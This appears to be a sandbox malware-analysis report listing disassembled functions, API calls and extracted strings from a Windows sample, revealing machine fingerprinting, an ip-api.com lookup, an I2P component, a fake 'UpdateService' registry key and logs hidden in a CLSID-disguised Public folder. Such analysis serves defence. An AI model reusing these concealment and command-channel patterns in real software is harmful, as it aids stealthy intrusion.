Part of subcall function 00007FFE11EC4DF4: LoadLibraryA.KERNEL32 ref: 00007FFE11EC4E02

Part of subcall function 00007FFE11EC4D73: GetProcAddress.KERNEL32 ref: 00007FFE11EC4D93

FreeLibrary.KERNEL32 ref: 00007FFE11EC455F
GetNativeSystemInfo.KERNEL32 ref: 00007FFE11EC45AB
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE11EC45C4
GetLastError.KERNEL32 ref: 00007FFE11EC45D2

Strings

9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE11EC46EC, 00007FFE11EC47C0
MachineGuid, xrefs: 00007FFE11EC46F3
C:\Windows, xrefs: 00007FFE11EC45BD, 00007FFE11EC46B0
P, xrefs: 00007FFE11EC4802
:, xrefs: 00007FFE11EC472B
ntdll.dll, xrefs: 00007FFE11EC44D4
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE11EC47D5
sys_init, xrefs: 00007FFE11EC453D, 00007FFE11EC4572, 00007FFE11EC45DD, 00007FFE11EC46BE, 00007FFE11EC4790, 00007FFE11EC47CE, 00007FFE11EC4881, 00007FFE11EC4917, 00007FFE11EC49F0
RtlGetVersion, xrefs: 00007FFE11EC44EC
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC4579
, xrefs: 00007FFE11EC47A3
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE11EC4797
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE11EC46FA
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE11EC49F7
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE11EC46C5
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE11EC4888
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE11EC491E
%, xrefs: 00007FFE11EC46D9
\, xrefs: 00007FFE11EC4730
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE11EC4544
~, xrefs: 00007FFE11EC47F9
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE11EC45E4

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 99febd57b35f821ac2f0ce874996274aa8bac9404407d019d9cddeeda8cdaf70
Instruction ID: 2d72e02f2b95b269e88c0880ade6121efeac84632f18835bd02c6bf6f6fb7dfb
Opcode Fuzzy Hash: 99febd57b35f821ac2f0ce874996274aa8bac9404407d019d9cddeeda8cdaf70
Instruction Fuzzy Hash: A3D17E61E0CE5381FB2097D7EC403BB62A8AB51774F9551B6D94E17BB4EE2CF8448341

Function 00007FF7C1AB28FC Relevance: 52.8, APIs: 10, Strings: 20, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C1AB2304: LoadLibraryA.KERNEL32(?,?,service,00000157C50713D0,00007FF7C1AB2910), ref: 00007FF7C1AB2312

Part of subcall function 00007FF7C1AB2283: GetProcAddress.KERNEL32(?,?,00000000,00000157C50713D0,?,00007FF7C1AB292B), ref: 00007FF7C1AB22A3

FreeLibrary.KERNEL32 ref: 00007FF7C1AB298F
GetNativeSystemInfo.KERNEL32 ref: 00007FF7C1AB29DB
GetWindowsDirectoryA.KERNEL32 ref: 00007FF7C1AB29F4
GetLastError.KERNEL32 ref: 00007FF7C1AB2A02

Strings

\, xrefs: 00007FF7C1AB2B60
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FF7C1AB2AF5
service, xrefs: 00007FF7C1AB28FF
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FF7C1AB2CB8
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF7C1AB29A9
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FF7C1AB2B1C, 00007FF7C1AB2BF0
ntdll.dll, xrefs: 00007FF7C1AB2904
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FF7C1AB2974
sys_init, xrefs: 00007FF7C1AB296D, 00007FF7C1AB29A2, 00007FF7C1AB2A0D, 00007FF7C1AB2AEE, 00007FF7C1AB2BC0, 00007FF7C1AB2BFE, 00007FF7C1AB2CB1, 00007FF7C1AB2D47, 00007FF7C1AB2E20
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FF7C1AB2A14
C:\Windows, xrefs: 00007FF7C1AB29ED, 00007FF7C1AB2AE0
%, xrefs: 00007FF7C1AB2B09
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FF7C1AB2C05
RtlGetVersion, xrefs: 00007FF7C1AB291C
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FF7C1AB2B2A
:, xrefs: 00007FF7C1AB2B5B
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FF7C1AB2E27
MachineGuid, xrefs: 00007FF7C1AB2B23
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FF7C1AB2BC7
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FF7C1AB2D4E

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
API String ID: 3828489143-3798070276
Opcode ID: 080eab42d11e341088ee9c0150e6ca92e028b00ecaa64304e25d3df71537468d
Instruction ID: 4f82021828cffb708c6e4c950f8a573decc57dacb1fb0b90a73aac2de49eaa9c
Opcode Fuzzy Hash: 080eab42d11e341088ee9c0150e6ca92e028b00ecaa64304e25d3df71537468d
Instruction Fuzzy Hash: 3AD133B1E0C69285FB20EF16A450BBDA760AB407B5F950133CD4E577A4DEAEF884C361

Function 00007FFE1A52BC77 Relevance: 39.4, APIs: 8, Strings: 18, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

last-patch, xrefs: 00007FFE1A52BEAC
-ILCCNC-, xrefs: 00007FFE1A52C1D2
Referer, xrefs: 00007FFE1A52BED2
mem_alloc, xrefs: 00007FFE1A52C30C
KCIT, xrefs: 00007FFE1A52BCA3
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE1A52C313
-ILCCNC-, xrefs: 00007FFE1A52BDD7
, xrefs: 00007FFE1A52C1BC
-VRSCNC-, xrefs: 00007FFE1A52C231
TPCR, xrefs: 00007FFE1A52BD0F
/line?fields=query, xrefs: 00007FFE1A52BF89
curl/8.4.0, xrefs: 00007FFE1A52BF9D
ip-api.com, xrefs: 00007FFE1A52BF96
--TSCB--, xrefs: 00007FFE1A52C241
-ILCCNC-, xrefs: 00007FFE1A52BC89
AKAK, xrefs: 00007FFE1A52BD08
AKAK, xrefs: 00007FFE1A52C1C7
SYSTEM\CurrentControlSet\Services\UpdateService\Parameters, xrefs: 00007FFE1A52BED9

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID:
String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$Referer$SYSTEM\CurrentControlSet\Services\UpdateService\Parameters$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$ip-api.com$last-patch$mem_alloc
API String ID: 0-4235120829
Opcode ID: dd9b79688cd0451efef8b4d798b38d9b34a6f91578c4f62828ec16dba5e2c159
Instruction ID: 3601005c2235065dcd9fdb2f8cf3eb4fb20d0b04ebeca761407abfa151df3a9b
Opcode Fuzzy Hash: dd9b79688cd0451efef8b4d798b38d9b34a6f91578c4f62828ec16dba5e2c159
Instruction Fuzzy Hash: F7124E61B0DE82C2EA608B96E4403BA63A2EF86B64F5046F7DA5D477B5DF3CE445C700

Function 00007FFE1A52A670 Relevance: 37.7, APIs: 9, Strings: 16, Instructions: 167
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A527734: LoadLibraryA.KERNEL32 ref: 00007FFE1A527742

Part of subcall function 00007FFE1A527400: GetModuleHandleExA.KERNEL32 ref: 00007FFE1A52741E

strlen.MSVCRT ref: 00007FFE1A52A7C8
strlen.MSVCRT ref: 00007FFE1A52A7E4
strcat.MSVCRT ref: 00007FFE1A52A800
strlen.MSVCRT ref: 00007FFE1A52A808
strcat.MSVCRT ref: 00007FFE1A52A82F
strlen.MSVCRT ref: 00007FFE1A52A837
strcat.MSVCRT ref: 00007FFE1A52A855
strlen.MSVCRT ref: 00007FFE1A52A85D
strlen.MSVCRT ref: 00007FFE1A52A877

Strings

i2p, xrefs: 00007FFE1A52A83C
Done, xrefs: 00007FFE1A52A93E
i2p_init, xrefs: 00007FFE1A52A945, 00007FFE1A52A96B
C_StartI2P, xrefs: 00007FFE1A52A907
i2p.su3, xrefs: 00007FFE1A52A899
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A52A972
--datadi, xrefs: 00007FFE1A52A6B4
.file=, xrefs: 00007FFE1A52A6F3
--conf=, xrefs: 00007FFE1A52A67A
--reseed, xrefs: 00007FFE1A52A6E9
i2p.su3, xrefs: 00007FFE1A52A862
i2p.conf, xrefs: 00007FFE1A52A810
[I] (%s) -> %s, xrefs: 00007FFE1A52A94C
C_InitI2P, xrefs: 00007FFE1A52A8E8
i2p, xrefs: 00007FFE1A52A92E
libi2p.dll, xrefs: 00007FFE1A52A762

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: strlen$strcat$HandleLibraryLoadModule
String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
API String ID: 1893813203-492052463
Opcode ID: aebe301ea77f47b819ae4e02351c40eef5913accd0ab7f2ddaf9c8f3282d6c25
Instruction ID: 4d285410c5928897326b8bcee0d84f53d3508fad136099a6974ffc37d2c82845
Opcode Fuzzy Hash: aebe301ea77f47b819ae4e02351c40eef5913accd0ab7f2ddaf9c8f3282d6c25
Instruction Fuzzy Hash: 26719E72B0CF82D1E7259B56E4503FA6292AF96B90F4400B3DA8D4B7A9EF7CE505C740

Function 00007FFE11BDC9FC Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11BDCA1C
GetLastError.KERNEL32 ref: 00007FFE11BDCB50

Part of subcall function 00007FFE11BDB930: GetModuleHandleExA.KERNEL32 ref: 00007FFE11BDB94E

strlen.MSVCRT ref: 00007FFE11BDCA6E
strlen.MSVCRT ref: 00007FFE11BDCA8A
strcat.MSVCRT ref: 00007FFE11BDCAA5
strlen.MSVCRT ref: 00007FFE11BDCAAD
strlen.MSVCRT ref: 00007FFE11BDCAC2
fopen.MSVCRT ref: 00007FFE11BDCAE8

Strings

[I] (%s) -> %s, xrefs: 00007FFE11BDCC9B
log, xrefs: 00007FFE11BDCAD7
~, xrefs: 00007FFE11BDCBD5
, xrefs: 00007FFE11BDCB6E
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE11BDCB62
rdpctl.l, xrefs: 00007FFE11BDCACA
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE11BDCB15
Done, xrefs: 00007FFE11BDCC8D
debug_init, xrefs: 00007FFE11BDCB0E, 00007FFE11BDCB33, 00007FFE11BDCB5B, 00007FFE11BDCC20, 00007FFE11BDCC94
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE11BDCC27
P, xrefs: 00007FFE11BDCBDA
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFE11BDCA4E, 00007FFE11BDCA64, 00007FFE11BDCA9B, 00007FFE11BDCAB8, 00007FFE11BDCB07
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11BDCB3A

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
API String ID: 3395718042-1794035234
Opcode ID: b6d1a52f3503f5349d273879bbcd7da010761f72ce9b35bd60bd1f6f274df763
Instruction ID: c194ebb95a51b559b1044adebea2a1abb722d4dd36b4cd5aa0c680e3b4155128
Opcode Fuzzy Hash: b6d1a52f3503f5349d273879bbcd7da010761f72ce9b35bd60bd1f6f274df763
Instruction Fuzzy Hash: 60516C20E1CE47C1FF389F13A880AF95699AF04768F5430BAC90D462B2EE6DE9469341

Function 00007FFE1A4F14FC Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1A4F151C
GetLastError.KERNEL32 ref: 00007FFE1A4F1650

Part of subcall function 00007FFE1A4F3A80: GetModuleHandleExA.KERNEL32 ref: 00007FFE1A4F3A9E

strlen.MSVCRT ref: 00007FFE1A4F156E
strlen.MSVCRT ref: 00007FFE1A4F158A
strcat.MSVCRT ref: 00007FFE1A4F15A5
strlen.MSVCRT ref: 00007FFE1A4F15AD
strlen.MSVCRT ref: 00007FFE1A4F15C2
fopen.MSVCRT ref: 00007FFE1A4F15E8

Strings

[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE1A4F1727
, xrefs: 00007FFE1A4F166E
P, xrefs: 00007FFE1A4F16DA
~, xrefs: 00007FFE1A4F16D5
[I] (%s) -> %s, xrefs: 00007FFE1A4F179B
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE1A4F1662
dwlmgr.l, xrefs: 00007FFE1A4F15CA
Done, xrefs: 00007FFE1A4F178D
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE1A4F1615
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A4F163A
log, xrefs: 00007FFE1A4F15D7
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFE1A4F154E, 00007FFE1A4F1564, 00007FFE1A4F159B, 00007FFE1A4F15B8, 00007FFE1A4F1607
debug_init, xrefs: 00007FFE1A4F160E, 00007FFE1A4F1633, 00007FFE1A4F165B, 00007FFE1A4F1720, 00007FFE1A4F1794

Memory Dump Source

Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true

Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
API String ID: 3395718042-2859552336
Opcode ID: 3d9a113357acc3577ff2ea5f3ec24565adaeee734f24cd4d0693bf15a7530403
Instruction ID: f543fc9766d6285ad8d729b08ff36d964d6482501d87c2303b71abf7a949fd08
Opcode Fuzzy Hash: 3d9a113357acc3577ff2ea5f3ec24565adaeee734f24cd4d0693bf15a7530403
Instruction Fuzzy Hash: 35510750F0CF5782FA209B1BA9903FC1255AB46FA5F9860F3CB0E062B5EE6CA955C301

Function 00007FFE126E221C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE126E223C
GetLastError.KERNEL32 ref: 00007FFE126E2370

Part of subcall function 00007FFE126E4E20: GetModuleHandleExA.KERNEL32 ref: 00007FFE126E4E3E

strlen.MSVCRT ref: 00007FFE126E228E
strlen.MSVCRT ref: 00007FFE126E22AA
strcat.MSVCRT ref: 00007FFE126E22C5
strlen.MSVCRT ref: 00007FFE126E22CD
strlen.MSVCRT ref: 00007FFE126E22E2
fopen.MSVCRT ref: 00007FFE126E2308

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126E235A
[I] (%s) -> %s, xrefs: 00007FFE126E24BB
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log, xrefs: 00007FFE126E226E, 00007FFE126E2284, 00007FFE126E22BB, 00007FFE126E22D8, 00007FFE126E2327
debug_init, xrefs: 00007FFE126E232E, 00007FFE126E2353, 00007FFE126E237B, 00007FFE126E2440, 00007FFE126E24B4
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE126E2382
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE126E2447
P, xrefs: 00007FFE126E23FA
Done, xrefs: 00007FFE126E24AD
~, xrefs: 00007FFE126E23F5
, xrefs: 00007FFE126E238E
evtsrv.l, xrefs: 00007FFE126E22EA
log, xrefs: 00007FFE126E22F7
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE126E2335

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
API String ID: 3395718042-190452282
Opcode ID: 59e782ed6a1c19385272f51f88c15abcad5e3104e4494a3cefd5bae1c37b7bce
Instruction ID: ff256f3ac0599b582e8273e001e703b51577713c6b7cd162aa6e609e1add7309
Opcode Fuzzy Hash: 59e782ed6a1c19385272f51f88c15abcad5e3104e4494a3cefd5bae1c37b7bce
Instruction Fuzzy Hash: 9C512661A0CE53CAFB20DB53AC903B82352AF55774F9041F2C90E466FADEEDA9468705

Function 00007FFE1A52794C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1A52796C
GetLastError.KERNEL32 ref: 00007FFE1A527AA0

Part of subcall function 00007FFE1A527400: GetModuleHandleExA.KERNEL32 ref: 00007FFE1A52741E

strlen.MSVCRT ref: 00007FFE1A5279BE
strlen.MSVCRT ref: 00007FFE1A5279DA
strcat.MSVCRT ref: 00007FFE1A5279F5
strlen.MSVCRT ref: 00007FFE1A5279FD
strlen.MSVCRT ref: 00007FFE1A527A12
fopen.MSVCRT ref: 00007FFE1A527A38

Strings

P, xrefs: 00007FFE1A527B2A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE1A527AB2
log, xrefs: 00007FFE1A527A27
[I] (%s) -> %s, xrefs: 00007FFE1A527BEB
cnccli.l, xrefs: 00007FFE1A527A1A
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE1A527A65
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log, xrefs: 00007FFE1A52799E, 00007FFE1A5279B4, 00007FFE1A5279EB, 00007FFE1A527A08, 00007FFE1A527A57
Done, xrefs: 00007FFE1A527BDD
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE1A527A8A
, xrefs: 00007FFE1A527ABE
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE1A527B77
~, xrefs: 00007FFE1A527B25
debug_init, xrefs: 00007FFE1A527A5E, 00007FFE1A527A83, 00007FFE1A527AAB, 00007FFE1A527B70, 00007FFE1A527BE4

Memory Dump Source

Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true

Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
API String ID: 3395718042-315528054
Opcode ID: 2310b059fd1db1d94807d4043fe70c93fc81e218b0df7df5f885e9a005487d1a
Instruction ID: 1d05ca37283157023b45d9a7b9d14daa948afd21534003a8dcb45f2b263c31ed
